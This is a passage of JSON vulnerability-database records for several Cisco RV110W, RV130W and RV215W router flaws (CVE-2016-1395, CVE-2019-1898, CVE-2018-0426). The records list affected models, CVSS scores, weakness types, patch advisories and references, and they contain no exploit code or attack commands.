"db": "BID",
"id": "91224",
"trust": 0.4
},
{
"db": "VULHUB",
"id": "VHN-90214",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04096"
},
{
"db": "VULHUB",
"id": "VHN-90214"
},
{
"db": "BID",
"id": "91224"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003298"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-367"
},
{
"db": "NVD",
"id": "CVE-2016-1395"
}
]
},
"id": "VAR-201606-0431",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04096"
},
{
"db": "VULHUB",
"id": "VHN-90214"
}
],
"trust": 1.233139435
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04096"
}
]
},
"last_update_date": "2024-11-23T22:07:49.112000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "cisco-sa-20160615-rv",
"trust": 0.8,
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160615-rv"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-003298"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-90214"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003298"
},
{
"db": "NVD",
"id": "CVE-2016-1395"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160615-rv"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id/1036113"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1395"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-1395"
},
{
"trust": 0.6,
"url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160615-rv/"
},
{
"trust": 0.3,
"url": "http://www.cisco.com/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04096"
},
{
"db": "VULHUB",
"id": "VHN-90214"
},
{
"db": "BID",
"id": "91224"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003298"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-367"
},
{
"db": "NVD",
"id": "CVE-2016-1395"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2016-04096"
},
{
"db": "VULHUB",
"id": "VHN-90214"
},
{
"db": "BID",
"id": "91224"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003298"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-367"
},
{
"db": "NVD",
"id": "CVE-2016-1395"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-06-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-04096"
},
{
"date": "2016-06-19T00:00:00",
"db": "VULHUB",
"id": "VHN-90214"
},
{
"date": "2016-06-15T00:00:00",
"db": "BID",
"id": "91224"
},
{
"date": "2016-06-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-003298"
},
{
"date": "2016-06-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201606-367"
},
{
"date": "2016-06-19T01:59:03.077000",
"db": "NVD",
"id": "CVE-2016-1395"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-06-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-04096"
},
{
"date": "2016-11-30T00:00:00",
"db": "VULHUB",
"id": "VHN-90214"
},
{
"date": "2016-07-06T15:01:00",
"db": "BID",
"id": "91224"
},
{
"date": "2016-06-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-003298"
},
{
"date": "2016-06-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201606-367"
},
{
"date": "2024-11-21T02:46:21.790000",
"db": "NVD",
"id": "CVE-2016-1395"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201606-367"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Cisco Device product firmware Web In the base management interface root Vulnerability to execute arbitrary code with privileges",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-003298"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201606-367"
}
],
"trust": 0.6
}
}
var-201906-0689
Vulnerability from variot
A vulnerability in the web-based management interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to access the syslog file on an affected device. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing the URL for the syslog file. A successful exploit could allow the attacker to access the information contained in the file. The Cisco\302\256 RV110W and so on are all VPN firewall routers from Cisco. Successfully exploiting this issue may allow an attacker to bypass certain security restrictions and perform unauthorized actions
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201906-0689",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rv130w",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "rv110w",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w wireless-n multifunction vpn routerr",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv110w",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-18901"
},
{
"db": "BID",
"id": "108865"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005707"
},
{
"db": "NVD",
"id": "CVE-2019-1898"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv130w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-005707"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jacob Baines of Tenable, Inc. .",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-796"
}
],
"trust": 0.6
},
"cve": "CVE-2019-1898",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2019-1898",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-18901",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-151380",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "ykramarz@cisco.com",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"id": "CVE-2019-1898",
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"id": "CVE-2019-1898",
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-1898",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "ykramarz@cisco.com",
"id": "CVE-2019-1898",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2019-1898",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2019-18901",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201906-796",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-151380",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2019-1898",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-18901"
},
{
"db": "VULHUB",
"id": "VHN-151380"
},
{
"db": "VULMON",
"id": "CVE-2019-1898"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005707"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-796"
},
{
"db": "NVD",
"id": "CVE-2019-1898"
},
{
"db": "NVD",
"id": "CVE-2019-1898"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A vulnerability in the web-based management interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to access the syslog file on an affected device. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing the URL for the syslog file. A successful exploit could allow the attacker to access the information contained in the file. The Cisco\\302\\256 RV110W and so on are all VPN firewall routers from Cisco. \nSuccessfully exploiting this issue may allow an attacker to bypass certain security restrictions and perform unauthorized actions",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-1898"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005707"
},
{
"db": "CNVD",
"id": "CNVD-2019-18901"
},
{
"db": "BID",
"id": "108865"
},
{
"db": "VULHUB",
"id": "VHN-151380"
},
{
"db": "VULMON",
"id": "CVE-2019-1898"
}
],
"trust": 2.61
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-1898",
"trust": 3.5
},
{
"db": "BID",
"id": "108865",
"trust": 2.1
},
{
"db": "TENABLE",
"id": "TRA-2019-29",
"trust": 1.8
},
{
"db": "AUSCERT",
"id": "ESB-2019.2190",
"trust": 1.2
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005707",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201906-796",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-18901",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-151380",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2019-1898",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-18901"
},
{
"db": "VULHUB",
"id": "VHN-151380"
},
{
"db": "VULMON",
"id": "CVE-2019-1898"
},
{
"db": "BID",
"id": "108865"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005707"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-796"
},
{
"db": "NVD",
"id": "CVE-2019-1898"
}
]
},
"id": "VAR-201906-0689",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-18901"
},
{
"db": "VULHUB",
"id": "VHN-151380"
}
],
"trust": 1.2914166040000001
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-18901"
}
]
},
"last_update_date": "2024-11-23T22:06:10.379000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "cisco-sa-20190619-rv-fileaccess",
"trust": 0.8,
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-rv-fileaccess"
},
{
"title": "Patch for CiscoRV110W, RV130W, and RV215W Authorization Issue Vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/164675"
},
{
"title": "Cisco RV110W , RV130W and RV215W Remediation measures for authorization problem vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=93946"
},
{
"title": "Cisco: Cisco RV110W, RV130W, and RV215W Routers Unauthenticated syslog File Access Vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20190619-rv-fileaccess"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-18901"
},
{
"db": "VULMON",
"id": "CVE-2019-1898"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005707"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-796"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-285",
"trust": 1.9
},
{
"problemtype": "CWE-425",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-151380"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005707"
},
{
"db": "NVD",
"id": "CVE-2019-1898"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rv-fileaccess"
},
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/108865"
},
{
"trust": 1.8,
"url": "https://www.tenable.com/security/research/tra-2019-29"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-1898"
},
{
"trust": 1.2,
"url": "https://www.auscert.org.au/bulletins/esb-2019.2190/"
},
{
"trust": 0.9,
"url": "http://www.cisco.com/"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-1898"
},
{
"trust": 0.6,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rv-dos"
},
{
"trust": 0.6,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rv-infodis"
},
{
"trust": 0.6,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rvrouters-dos"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/425.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-18901"
},
{
"db": "VULHUB",
"id": "VHN-151380"
},
{
"db": "VULMON",
"id": "CVE-2019-1898"
},
{
"db": "BID",
"id": "108865"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005707"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-796"
},
{
"db": "NVD",
"id": "CVE-2019-1898"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-18901"
},
{
"db": "VULHUB",
"id": "VHN-151380"
},
{
"db": "VULMON",
"id": "CVE-2019-1898"
},
{
"db": "BID",
"id": "108865"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005707"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-796"
},
{
"db": "NVD",
"id": "CVE-2019-1898"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-18901"
},
{
"date": "2019-06-20T00:00:00",
"db": "VULHUB",
"id": "VHN-151380"
},
{
"date": "2019-06-20T00:00:00",
"db": "VULMON",
"id": "CVE-2019-1898"
},
{
"date": "2019-06-19T00:00:00",
"db": "BID",
"id": "108865"
},
{
"date": "2019-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-005707"
},
{
"date": "2019-06-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-796"
},
{
"date": "2019-06-20T03:15:12.433000",
"db": "NVD",
"id": "CVE-2019-1898"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-18901"
},
{
"date": "2020-10-16T00:00:00",
"db": "VULHUB",
"id": "VHN-151380"
},
{
"date": "2020-10-16T00:00:00",
"db": "VULMON",
"id": "CVE-2019-1898"
},
{
"date": "2019-06-19T00:00:00",
"db": "BID",
"id": "108865"
},
{
"date": "2019-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-005707"
},
{
"date": "2020-10-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-796"
},
{
"date": "2024-11-21T04:37:38.620000",
"db": "NVD",
"id": "CVE-2019-1898"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-796"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Cisco Vulnerabilities related to authorization in routers",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-005707"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-796"
}
],
"trust": 0.6
}
}
var-201810-0304
Vulnerability from variot
A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to gain access to sensitive information. The vulnerability is due to improper validation of directory traversal character sequences within the web-based management interface. An attacker could exploit this vulnerability by sending malicious requests to the targeted device. A successful exploit could allow the attacker to gain access to arbitrary files on the affected device, resulting in the disclosure of sensitive information. The RV110W is a Wireless-NVPN firewall router. The RV130W is a Wireless-N multi-function VPN router. The RV215W is a Wireless-NVPN router
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201810-0304",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rv110w wireless-n vpn firewall",
"scope": null,
"trust": 1.4,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": null,
"trust": 1.4,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "1.0.3.44"
},
{
"model": "rv215w",
"scope": "lte",
"trust": 1.0,
"vendor": "cisco",
"version": "1.3.0.8"
},
{
"model": "rv110w",
"scope": "lte",
"trust": 1.0,
"vendor": "cisco",
"version": "1.2.1.7"
},
{
"model": "rv130w wireless-n multifunction vpn routerr",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "1.0.1.3"
},
{
"model": "rv215w",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "1.3.0.8"
},
{
"model": "rv110w",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "1.2.1.7"
},
{
"model": "rv130w",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "1.0.2.7"
},
{
"model": "rv130w",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "1.0.0.21"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-18072"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010840"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-262"
},
{
"db": "NVD",
"id": "CVE-2018-0426"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
